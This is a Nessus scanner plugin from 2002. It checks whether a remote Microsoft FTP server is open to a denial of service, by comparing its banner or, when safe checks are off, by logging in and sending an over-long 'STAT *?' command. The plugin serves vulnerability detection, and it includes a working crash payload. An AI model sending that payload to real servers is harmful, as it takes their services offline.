#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# Thanks to: H D Moore
# 
#
# See the Nessus Scripts License for details
# 

if(description)
{
 script_id(10934);
 script_cve_id("CAN-2002-0073");
 
 script_version ("$Revision: 1.5 $");
 
 name["english"] = string("MS FTPd DoS");
 
 script_name(english:name["english"]);
	     
 desc["english"] = "
It was possible to make the remote FTP server crash
by sending the command 'STAT *?AAAAA....AAAAA'

An attacker may use this flaw to prevent your FTP server
from working properly


Solution : see http://www.microsoft.com/technet/security/bulletin/ms02-018.asp
Risk factor : Medium";
		 
 script_description(english:desc["english"]);
		    
 
 script_summary(english:"Checks if the remote ftp can be crashed",
 		francais:"Dtermine si le serveur ftp peut tre plant");
 script_category(ACT_MIXED_ATTACK);
 script_family(english:"FTP");
 script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison",
 		  francais:"Ce script est Copyright (C) 2002 Renaud Deraison");
		  
 script_dependencies("find_service.nes", "ftp_anonymous.nasl");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

#
# The script code starts here : 
#



# First, we need access
login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");



port = get_kb_item("Services/ftp");
if(!port)port = 21;

if(get_port_state(port))
{

banner = get_kb_item(string("ftp/banner/", port));


if(!safe_checks())
{
if(login)
{
# Connect to the FTP server
soc = open_sock_tcp(port);
if(soc)
{
 if(ftp_log_in(socket:soc, user:login, pass:password))
 {
     # We are in
     c = string("STAT *?", crap(240), "\r\n");
     send(socket:soc, data:c);
     b = recv(socket:soc, length:1024);
     send(socket:soc, data:string("HELP\r\n"));
     r = recv(socket:soc, length:1024);
     if(!r)security_hole(port);
     else {
     quit = string("QUIT\r\n");
     send(socket:soc, data:quit);
     close(soc);
     }
    exit(0);
   }
  }
 }
}


if(!banner)
{ 
 soc = open_sock_tcp(port);
 banner = recv_line(socket:soc, length:4096);
}




if(banner)
{
 if(ereg(pattern:".*Microsoft FTP Service.*[45]\.0.*$",string:banner))
 {
 		report = 
string("It may be possible to make the remote FTP server crash\n",
"by sending the command 'STAT *?AAA...AAA.\n\n",
"An attacker may use this flaw to prevent your site from distributing files\n\n",
"*** Warning : we could not verify this vulnerability.\n",
"*** Nessus solely relied on the banner of this server\n\n",
"Solution : Apply the relevant hotfix from Microsoft\n\n",
"Risk factor : High");
  		security_hole(port:port, data:report);
   }
}
}
